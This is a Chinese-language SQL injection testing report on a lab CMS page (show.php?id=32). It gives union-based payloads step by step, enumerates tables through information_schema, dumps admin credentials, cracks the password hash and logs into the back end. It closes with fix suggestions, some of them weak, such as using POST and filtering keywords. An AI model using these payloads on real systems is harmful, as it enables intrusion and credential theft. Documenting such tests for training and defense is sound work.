SQL注入漏洞挖掘报告

漏洞挖掘环境
角色 操作系统 IP地址
攻击机 Kali Linux 192.168.232.129
靶机 Windows Serve 2008 192.168.232.131
漏洞挖掘使用工具
工具名称 作用
SQLMap 自动化SQL注入
Burpsuite Web抓包

漏洞页面 http://192.168.232.131/cms/show.php?id=32
SQL注入字段 id
漏洞类型 联合查询类SQL注入漏洞
漏洞挖掘过程
1.寻找SQL注入点 在URL后加入单引号测试;

2.确认注入点的类型(是数字型)

3.猜解当前页面查询的字段总数
在URL后加上 order by 1,并逐步加大数直到报错为止,报错的上一个数字就是字段总数

一共15个字段

4.查询当前页面中显示了哪几个字段在URL后加上

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

5.查询当前网站数据库的名称在URL后加上
and 1=2 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15

6.查询当前数据库中所有表的名称
‘and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name),15 from information_schema.tables where table_schema=database()’

7.查询指定表中所有字段名称:

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(column_name),15 from information_schema.columns where table_name=’cms_users’

8.查询表中username和password内容

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,username,13,password,15 from cms_users

爆破出用户名为admin,由于密码是加密的,使用cmd5.com解析密码

爆破出密码为123456
使用该账号密码进入后台管理验证成功进入后台

成功进入后台

漏洞修补建议 |1.尽量使用POST方式去传递数据

        |2.过滤敏感字符像单引号,双引号、#、and 1=1、or 1=1、union、order by等数据库语言
        |3.使用PDO防护
        |4.前后端分离